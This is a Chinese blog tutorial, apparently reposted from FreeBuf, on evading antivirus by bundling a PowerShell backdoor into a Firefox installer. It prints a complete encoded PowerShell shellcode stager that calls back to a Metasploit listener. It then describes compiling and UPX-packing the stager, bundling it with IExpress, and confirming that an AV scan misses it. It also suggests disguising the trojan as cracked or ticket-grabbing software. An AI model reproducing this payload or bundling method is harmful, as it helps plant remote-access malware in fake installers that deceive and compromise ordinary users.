一种基于软件捆绑方式Bypass AV的思路

admin

原文链接：http://www.freebuf.com/articles/system/186168.html

前言

基于无文件攻击的思路利用 PowerShell 执行恶意代码的攻击频繁发生， Powershell 一时间成了恶意病毒的主战场，最近尝试了一种猥琐方式通过捆绑安装的方式将 Powshell 后门植入到软件安装包的方式绕过杀毒软件检测的方法。

0×1 制作后门

先在 Kali 下面生成一个 Powershell 的后门，通过编码的方式先进行简单的混淆。

[/url]

生成的代码文件内容如下：

1. powershell -w 1 -C "sv wg -;sv kd ec;sv Kp ((gv wg).value.toString()+(gv kd).value.toString());powershell (gv Kp).value.toString() 'JABrAGwAIAA9ACAAJwAkAGUAVQAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnACcAOwAkAHQAaAAgAD0AIABBAGQAZAAtAFQAeQBwAGUAIAAtAG0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAGUAVQAgAC0ATgBhAG0AZQAgACIAVwBpAG4AMwAyACIAIAAtAG4AYQBtAGUAcwBwAGEAYwBlACAAVwBpAG4AMwAyAEYAdQBuAGMAdABpAG8AbgBzACAALQBwAGEAcwBzAHQAaAByAHUAOwBbAEIAeQB0AGUAWwBdAF0AOwBbAEIAeQB0AGUAWwBdAF0AJABCAG4AIAA9ACAAMAB4AGYAYwAsADAAeABlADgALAAwAHgAOAAyACwAMAB4ADAAMAAsADAAeAAwADAALAAwAHgAMAAwACwAMAB4ADYAMAAsADAAeAA4ADkALAAwAHgAZQA1ACwAMAB4ADMAMQAsADAAeABjADAALAAwAHgANgA0ACwAMAB4ADgAYgAsADAAeAA1ADAALAAwAHgAMwAwACwAMAB4ADgAYgAsADAAeAA1ADIALAAwAHgAMABjACwAMAB4ADgAYgAsADAAeAA1ADIALAAwAHgAMQA0ACwAMAB4ADgAYgAsADAAeAA3ADIALAAwAHgAMgA4ACwAMAB4ADAAZgAsADAAeABiADcALAAwAHgANABhACwAMAB4ADIANgAsADAAeAAzADEALAAwAHgAZgBmACwAMAB4AGEAYwAsADAAeAAzAGMALAAwAHgANgAxACwAMAB4ADcAYwAsADAAeAAwADIALAAwAHgAMgBjACwAMAB4ADIAMAAsADAAeABjADEALAAwAHgAYwBmACwAMAB4ADAAZAAsADAAeAAwADEALAAwAHgAYwA3ACwAMAB4AGUAMgAsADAAeABmADIALAAwAHgANQAyACwAMAB4ADUANwAsADAAeAA4AGIALAAwAHgANQAyACwAMAB4ADEAMAAsADAAeAA4AGIALAAwAHgANABhACwAMAB4ADMAYwAsADAAeAA4AGIALAAwAHgANABjACwAMAB4ADEAMQAsADAAeAA3ADgALAAwAHgAZQAzACwAMAB4ADQAOAAsADAAeAAwADEALAAwAHgAZAAxACwAMAB4ADUAMQAsADAAeAA4AGIALAAwAHgANQA5ACwAMAB4ADIAMAAsADAAeAAwADEALAAwAHgAZAAzACwAMAB4ADgAYgAsADAAeAA0ADkALAAwAHgAMQA4ACwAMAB4AGUAMwAsADAAeAAzAGEALAAwAHgANAA5ACwAMAB4ADgAYgAsADAAeAAzADQALAAwAHgAOABiACwAMAB4ADAAMQAsADAAeABkADYALAAwAHgAMwAxACwAMAB4AGYAZgAsADAAeABhAGMALAAwAHgAYwAxACwAMAB4AGMAZgAsADAAeAAwAGQALAAwAHgAMAAxACwAMAB4AGMANwAsADAAeAAzADgALAAwAHgAZQAwACwAMAB4ADcANQAsADAAeABmADYALAAwAHgAMAAzACwAMAB4ADcAZAAsADAAeABmADgALAAwAHgAMwBiACwAMAB4ADcAZAAsADAAeAAyADQALAAwAHgANwA1ACwAMAB4AGUANAAsADAAeAA1ADgALAAwAHgAOABiACwAMAB4ADUAOAAsADAAeAAyADQALAAwAHgAMAAxACwAMAB4AGQAMwAsADAAeAA2ADYALAAwAHgAOABiACwAMAB4ADAAYwAsADAAeAA0AGIALAAwAHgAOABiACwAMAB4ADUAOAAsADAAeAAxAGMALAAwAHgAMAAxACwAMAB4AGQAMwAsADAAeAA4AGIALAAwAHgAMAA0ACwAMAB4ADgAYgAsADAAeAAwADEALAAwAHgAZAAwACwAMAB4ADgAOQAsADAAeAA0ADQALAAwAHgAMgA0ACwAMAB4ADIANAAsADAAeAA1AGIALAAwAHgANQBiACwAMAB4ADYAMQAsADAAeAA1ADkALAAwAHgANQBhACwAMAB4ADUAMQAsADAAeABmAGYALAAwAHgAZQAwACwAMAB4ADUAZgAsADAAeAA1AGYALAAwAHgANQBhACwAMAB4ADgAYgAsADAAeAAxADIALAAwAHgAZQBiACwAMAB4ADgAZAAsADAAeAA1AGQALAAwAHgANgA4ACwAMAB4ADYAZQAsADAAeAA2ADUALAAwAHgANwA0ACwAMAB4ADAAMAAsADAAeAA2ADgALAAwAHgANwA3ACwAMAB4ADYAOQAsADAAeAA2AGUALAAwAHgANgA5ACwAMAB4ADUANAAsADAAeAA2ADgALAAwAHgANABjACwAMAB4ADcANwAsADAAeAAyADYALAAwAHgAMAA3ACwAMAB4AGYAZgAsADAAeABkADUALAAwAHgAMwAxACwAMAB4AGQAYgAsADAAeAA1ADMALAAwAHgANQAzACwAMAB4ADUAMwAsADAAeAA1ADMALAAwAHgANQAzACwAMAB4ADYAOAAsADAAeAAzAGEALAAwAHgANQA2ACwAMAB4ADcAOQAsADAAeABhADcALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAA1ADMALAAwAHgANQAzACwAMAB4ADYAYQAsADAAeAAwADMALAAwAHgANQAzACwAMAB4ADUAMwAsADAAeAA2ADgALAAwAHgAYgBiACwAMAB4ADAAMQAsADAAeAAwADAALAAwAHgAMAAwACwAMAB4AGUAOAAsADAAeABiADAALAAwAHgAMAAwACwAMAB4ADAAMAAsADAAeAAwADAALAAwAHgAMgBmACwAMAB4ADUANgAsADAAeAAzADQALAAwAHgAMwAxACwAMAB4ADQANAAsADAAeAA2AGQALAAwAHgANgBkACwAMAB4ADUANQAsADAAeAA0AGYALAAwAHgANgAzACwAMAB4ADcAYQAsADAAeAA3ADIALAAwAHgANQAwACwAMAB4ADcANgAsADAAeAA2ADMALAAwAHgAMwA2ACwAMAB4ADMAOAAsADAAeAA2AGMALAAwAHgANAAyACwAMAB4ADQANgAsADAAeAA1ADMALAAwAHgANAA5ACwAMAB4ADQAMQAsADAAeAA0ADQALAAwAHgANgA3ACwAMAB4ADQANwAsADAAeAA2ADgALAAwAHgAMwAxACwAMAB4ADQAZgAsADAAeAA0AGUALAAwAHgAMAAwACwAMAB4ADUAMAAsADAAeAA2ADgALAAwAHgANQA3ACwAMAB4ADgAOQAsADAAeAA5AGYALAAwAHgAYwA2ACwAMAB4AGYAZgAsADAAeABkADUALAAwAHgAOAA5ACwAMAB4AGMANgAsADAAeAA1ADMALAAwAHgANgA4ACwAMAB4ADAAMAAsADAAeAAzADIALAAwAHgAZQAwACwAMAB4ADgANAAsADAAeAA1ADMALAAwAHgANQAzACwAMAB4ADUAMwAsADAAeAA1ADcALAAwAHgANQAzACwAMAB4ADUANgAsADAAeAA2ADgALAAwAHgAZQBiACwAMAB4ADUANQAsADAAeAAyAGUALAAwAHgAMwBiACwAMAB4AGYAZgAsADAAeABkADUALAAwAHgAOQA2ACwAMAB4ADYAYQAsADAAeAAwAGEALAAwAHgANQBmACwAMAB4ADYAOAAsADAAeAA4ADAALAAwAHgAMwAzACwAMAB4ADAAMAAsADAAeAAwADAALAAwAHgAOAA5ACwAMAB4AGUAMAAsADAAeAA2AGEALAAwAHgAMAA0ACwAMAB4ADUAMAAsADAAeAA2AGEALAAwAHgAMQBmACwAMAB4ADUANgAsADAAeAA2ADgALAAwAHgANwA1ACwAMAB4ADQANgAsADAAeAA5AGUALAAwAHgAOAA2ACwAMAB4AGYAZgAsADAAeABkADUALAAwAHgANQAzACwAMAB4ADUAMwAsADAAeAA1ADMALAAwAHgANQAzACwAMAB4ADUANgAsADAAeAA2ADgALAAwAHgAMgBkACwAMAB4ADAANgAsADAAeAAxADgALAAwAHgANwBiACwAMAB4AGYAZgAsADAAeABkADUALAAwAHgAOAA1ACwAMAB4AGMAMAAsADAAeAA3ADUALAAwAHgAMQA2ACwAMAB4ADYAOAAsADAAeAA4ADgALAAwAHgAMQAzACwAMAB4ADAAMAAsADAAeAAwADAALAAwAHgANgA4ACwAMAB4ADQANAAsADAAeABmADAALAAwAHgAMwA1ACwAMAB4AGUAMAAsADAAeABmAGYALAAwAHgAZAA1ACwAMAB4ADQAZgAsADAAeAA3ADUALAAwAHgAYwBkACwAMAB4ADYAOAAsADAAeABmADAALAAwAHgAYgA1ACwAMAB4AGEAMgAsADAAeAA1ADYALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAA2AGEALAAwAHgANAAwACwAMAB4ADYAOAAsADAAeAAwADAALAAwAHgAMQAwACwAMAB4ADAAMAAsADAAeAAwADAALAAwAHgANgA4ACwAMAB4ADAAMAAsADAAeAAwADAALAAwAHgANAAwACwAMAB4ADAAMAAsADAAeAA1ADMALAAwAHgANgA4ACwAMAB4ADUAOAAsADAAeABhADQALAAwAHgANQAzACwAMAB4AGUANQAsADAAeABmAGYALAAwAHgAZAA1ACwAMAB4ADkAMwAsADAAeAA1ADMALAAwAHgANQAzACwAMAB4ADgAOQAsADAAeABlADcALAAwAHgANQA3ACwAMAB4ADYAOAAsADAAeAAwADAALAAwAHgAMgAwACwAMAB4ADAAMAAsADAAeAAwADAALAAwAHgANQAzACwAMAB4ADUANgAsADAAeAA2ADgALAAwAHgAMQAyACwAMAB4ADkANgAsADAAeAA4ADkALAAwAHgAZQAyACwAMAB4AGYAZgAsADAAeABkADUALAAwAHgAOAA1ACwAMAB4AGMAMAAsADAAeAA3ADQALAAwAHgAYwBkACwAMAB4ADgAYgAsADAAeAAwADcALAAwAHgAMAAxACwAMAB4AGMAMwAsADAAeAA4ADUALAAwAHgAYwAwACwAMAB4ADcANQAsADAAeABlADUALAAwAHgANQA4ACwAMAB4AGMAMwAsADAAeAA1AGYALAAwAHgAZQA4ACwAMAB4ADYAOQAsADAAeABmAGYALAAwAHgAZgBmACwAMAB4AGYAZgAsADAAeAAzADEALAAwAHgAMwA5ACwAMAB4ADMAMgAsADAAeAAyAGUALAAwAHgAMwAxACwAMAB4ADMANgAsADAAeAAzADgALAAwAHgAMgBlACwAMAB4ADMAMQAsADAAeAAzADgALAAwAHgAMwA0ACwAMAB4ADIAZQAsADAAeAAzADEALAAwAHgAMwAzACwAMAB4ADMANAAsADAAeAAwADAAOwAkAG0AcQAgAD0AIAAwAHgAMQAwADAAMAA7AGkAZgAgACgAJABCAG4ALgBMAGUAbgBnAHQAaAAgAC0AZwB0ACAAMAB4ADEAMAAwADAAKQB7ACQAbQBxACAAPQAgACQAQgBuAC4ATABlAG4AZwB0AGgAfQA7ACQAQgBuAE0APQAkAHQAaAA6ADoAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKAAwACwAMAB4ADEAMAAwADAALAAkAG0AcQAsADAAeAA0ADAAKQA7AGYAbwByACAAKAAkAEIATAA9ADAAOwAkAEIATAAgAC0AbABlACAAKAAkAEIAbgAuAEwAZQBuAGcAdABoAC0AMQApADsAJABCAEwAKwArACkAIAB7ACQAdABoADoAOgBtAGUAbQBzAGUAdAAoAFsASQBuAHQAUAB0AHIAXQAoACQAQgBuAE0ALgBUAG8ASQBuAHQAMwAyACgAKQArACQAQgBMACkALAAgACQAQgBuAFsAJABCAEwAXQAsACAAMQApAH0AOwAkAHQAaAA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwAMAAsACQAQgBuAE0ALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ACkAewBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAA2ADAAfQA7ACcAOwAkAG4AcQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAQgB5AHQAZQBzACgAJABrAGwAKQApADsAJABNAGUAIAA9ACAAIgAtAGUAYwAgACIAOwBpAGYAKABbAEkAbgB0AFAAdAByAF0AOgA6AFMAaQB6AGUAIAAtAGUAcQAgADgAKQB7ACQAQgBuAE0AdwAgAD0AIAAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAAgACsAIAAiAFwAcwB5AHMAdwBvAHcANgA0AFwAVwBpAG4AZABvAHcAcwBQAG8AdwBlAHIAUwBoAGUAbABsAFwAdgAxAC4AMABcAHAAbwB3AGUAcgBzAGgAZQBsAGwAIgA7AGkAZQB4ACAAIgAmACAAJABCAG4ATQB3ACAAJABNAGUAIAAkAG4AcQAiAH0AZQBsAHMAZQB7ADsAaQBlAHgAIAAiACYAIABwAG8AdwBlAHIAcwBoAGUAbABsACAAJABNAGUAIAAkAG4AcQAiADsAfQA='"

复制代码

生成的txt文件能被塞门铁克直接识别出来，真是强大。

[url=http://image.3001.net/images/20181009/1539062888_5bbc3c687f5c6.jpg]

然后将代码保存成 .bat 文件，之后通过编译的方式转化成 exe 文件，这样后门就制造好了。

[/url]

假装给它加一个 UPX 的壳不能太明显了。

[url=http://image.3001.net/images/20181009/1539062354_5bbc3a52502dc.png]

0×2 捆绑

这里下载了 Firefox 的安装文件作为载体与后门的 exe 文件使用 IExpress 进行组装成一个新的后门：

[/url]

新生成的文件没有了以前的签名与描述信息当然这个可以随意更改无影响，文件大小也理所当然的有些出入。

[url=http://image.3001.net/images/20181009/1539062431_5bbc3a9f54a7f.png]

通过压缩包的方式打开详细如下：

[/url]

0×3 运行

运行此恶意软件首先和正常的安装火狐是一样的界面没有出入，安装完成之后会自动执行后门 exe 程序，调用本地的 Powershell 执行代码命令。

[url=http://image.3001.net/images/20181009/1539062504_5bbc3ae81dde0.jpg]

安装完成后查看本地的进程信息可以查看到进程树里面的启动顺序：

[/url]

本地开启的 Metasploit 监听到 session：

[url=http://image.3001.net/images/20181009/1539062645_5bbc3b75a1490.jpg]

使用杀毒软件做测试扫描，未检测出异常。

[url=http://image.3001.net/images/20181009/1539062688_5bbc3ba05ba86.jpg][/url]

0×4 总结

1. 为了做的更真实一点可以用一些常用的应用软件比如火车票抢票软件、百度云盘破解版之类的补充好描述信息比较有迷惑性，通信方式也可以用一些隐蔽的隧道。

2. 日常下载软件的时候尽量选择官网下载或者可信的第三方平台，认真检查一下签名说不定后面藏了一个大惊喜什么勒索之类。

Lowerce

学习了